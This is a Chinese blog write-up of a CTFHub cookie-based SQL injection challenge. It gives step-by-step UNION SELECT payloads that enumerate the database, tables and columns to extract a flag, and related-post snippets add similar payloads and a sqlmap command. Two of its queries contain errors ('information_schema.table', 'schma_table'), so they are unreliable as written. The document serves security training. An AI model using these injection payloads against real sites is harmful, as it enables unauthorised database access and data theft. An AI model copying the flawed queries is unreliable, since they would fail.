CTFHub-Cookie注入

最新推荐文章于 2025-06-05 11:46:39 发布
最新推荐文章于 2025-06-05 11:46:39 发布
阅读量207 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTFHub 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_51589948/article/details/117041430
本文介绍了一种通过Cookie注入来进行Web应用程序安全渗透测试的方法。主要内容包括如何使用Burp Suite抓取和修改Cookie,以及如何利用SQL注入漏洞获取敏感信息,如数据库名称、表名和列名等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

** Cookie注入**

  1. 根据提示寻找Cookie,对其进行bp抓包,并发包到repeater
    对cookie进行注入判断
    -1 union select 1,2
    在这里插入图片描述
  2. 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag
    -1 union select database(),1 查库名
    在这里插入图片描述
  3. 然后查询数据库的表名
    -1 union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’
    在这里插入图片描述
    表名分别为 news 和 kdekdoxcuj
  4. 然后查询kdekdoxcuj的列名
    -1 union select 1,group_concat(column_name) from information_schema.columns where schma_table=‘sqli’ and table_name=‘kdekdoxcuj’
    在这里插入图片描述
  5. 查询该库该表该列的所有字段
    -1 union select 1,group_concat(mkpojtslyb) from kdekdoxcuj
    在这里插入图片描述
    得出flag
【漏洞挖掘】——23、XXE漏洞挖掘刨析(上)
Fly_鹏程万里
03-05 3195
XML(可扩展标记语言)是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,它是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
cookie注入
LSYZWF的博客
05-20 2036
文章目录cooike注入cooike注入原理:cooike注入形成条件:cooike注入阶段:设置cooikeSQL-lab实战(less-21)参考文档参考文档 cooike注入 cooike注入原理: 修改cooike的值,使注入的值能够在拼接数据库查询语句从而获得信息,基本上与SQL注入中的get方式提交和post表单方式提交无区别。 cooike注入形成条件: 1、程序对get和post方式提交的数据进行了过滤,但未对cookie提交的数据库进行过滤。 2、在条件1的基础上还需要程序对提交数据获取方
Cookies注入
LoveStarbucks的博客
01-03 364
Cookies注入 1.Cookie介绍 2.Cookie注入代码分析 代码中使用Cookie传递参数,但是没有对Cookie中传递的参数进行过率操作。导致SQL注入漏洞的产生 3.Cookie注入利用 sqli20 利用‘or 1=1 --+输出第一个用户名和密码 4.Sqlmap安全检测 Sqlmap Cookie注入 sqlmap -r target.txt --level 3 --ba...
COOKIE注入攻击
最新发布
Yungoal的博客
06-05 1021
将admin改为abc' union select 1,2,group_concat(schema_name) from information_schema.schemata#​ 是服务器发送到用户浏览器并保存在本地的一小段数据(通常不超过 4KB)。浏览器会在后续请求中自动携带 Cookie,用于实现​。​ 的形式传输,并可以附加多个属性(如过期时间、作用域等)。浏览器在后续请求同一网站时,通过 HTTP 请求头(::->帮助Web站点保存有关访问者的信息。)自动附带该网站的 Cookie
Cookie注入
LOnely_ec0li的博客
10-31 2960
1.先找cookie,URL中输入/?id=1 2.用burpsuite抓包 3.尝试注入,更改 id=123+union+select+database(),2# 查询到数据库名sqli 4.查 询 表 名 接 着 更 改 id=123 union select group_concat(table_name),2 from information_schema.tables wheretable_schema=’sqli’# 5.查 询 字 段 名 输 入 id=123...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1012
CTFHUB SQL
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 969
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHub~SQL注入【MySQL结构+Cookie注入+UA注入+Refer注入+过滤空格】
weixin_67832625的博客
08-19 695
本文详细介绍了对后5段sql注入的类型,用最简单的语法和手法讲解了每一关的通过
关于ctfhubcookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 816
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库表sqlmap -u "http://challenge-593b57751..
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1388
CTFHUB-WEB-SQL注入
cookie 注入
白菜执笔人的博客
03-01 627
Web安全攻防 学习笔记 一、cookie 注入 1.1、HTTP 头中的注入介绍         服务器可以利用 cookies 包含信息的任意性来筛选并经常性维护这些信息,以判断在 HTTP 传 输中的状态。cookies 最经典的应用就是判断用户是否已经登录网站。 1.2、cookie 注入 代码中使用 Cookie 传递参数,但是没有对 Coo...
COOKIE注入
Drigon
04-21 406
接下来我会将最近整理有关渗透方式的总结一一发布,欢迎各位批评指正
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入”是一种常见的网络攻击手段,通过在输入框等可输入的地方输入特定的数据库操作语句,来实现对数据库的非授权操作。 最后,“cookie”是指在网站上存储用户信息的一种机制,可以通过注入SQL语句来获取其中的敏感信息,如账号密码等。 综上,这道题的意思是在一个CTFHub比赛的环境下,需要使用SQL注入来获取网站的cookie信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值